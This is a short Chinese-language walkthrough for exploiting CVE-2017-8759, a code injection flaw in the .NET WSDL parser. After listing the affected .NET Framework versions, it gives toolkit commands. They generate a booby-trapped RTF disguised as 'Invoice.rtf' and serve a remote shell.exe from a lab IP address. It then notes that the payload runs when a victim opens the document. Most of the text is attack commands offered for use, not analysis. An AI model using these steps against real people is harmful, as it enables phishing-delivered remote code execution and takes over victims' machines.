FireEye 最近检测到一个恶意的Microsoft Office RTF文档,利用CVE-2017-8759 WSDL解析器代码注入PrintClientProxy方法中的WSDL解析器模块中存在代码注入漏洞。如果提供的包含CRLF序列的数据,则IsValidUrl不会执行正确的验证。这就造成了攻击者注入和执行任意代码。
- Microsoft .NET Framework 4.6.2
- Microsoft .NET Framework 4.6.1
- Microsoft .NET Framework 3.5.1
- Microsoft .NET Framework 4.7
- Microsoft .NET Framework 4.6
- Microsoft .NET Framework 4.5.2
- Microsoft .NET Framework 3.5
- Microsoft .NET Framework 2.0 SP2
创建恶意文档
# python cve-2017-8759_toolkit.py -M gen -w Invoice.rtf -u http://192.168.154.200/logo.txt
Generating normal RTF payload.
Generated Invoice.rtf successfully
启动HTTP服务,监听指定端口
python cve-2017-8759_toolkit.py -M exp -e http://192.168.154.200/shell.exe -l /shm/shell.exe
当受害者打开 Invoice.rtf 即可执行 shell.exe,注意文档不能放在UNC路径